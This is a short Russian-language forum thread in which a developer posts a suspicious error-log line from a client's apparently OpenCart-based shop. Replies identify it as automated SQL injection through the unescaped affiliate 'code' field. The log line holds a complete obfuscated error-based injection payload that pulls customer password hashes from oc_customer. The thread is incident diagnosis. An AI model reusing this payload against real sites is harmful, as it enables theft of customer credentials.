pashast

Странные записи в логе ошибок

Рекомендуемые сообщения

pashast    376

Взял сайт клиента на доработку, а там куча подобных записей в логе

2017-01-09 7:02:41 - PHP Notice:  Error: Duplicate entry '!~!488f66ad1d22020293!~!1' for key 'group_key'<br />Error No: 1062<br />SELECT affiliate_id FROM `oc_affiliate` WHERE code = 'sk' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,ifnull(password,char(32)),0x217e21) /**/fRoM site.oc_customer /**/lImIt 744,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1' in

Может кто видел такое?

Похоже что кто-то пытался вытащить пароли

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
AlexDW    822

проверять сайт клиента на уязвимости

возможно, брешь в каком-то модуле

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
mpn2005    335

Типичный запрос для автоматических средств эксплуатации mysql-i уязвимостей.

 

Дырка в запросе к таблице oc_affiliate.

Не достаточное экранирование для поля - code.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу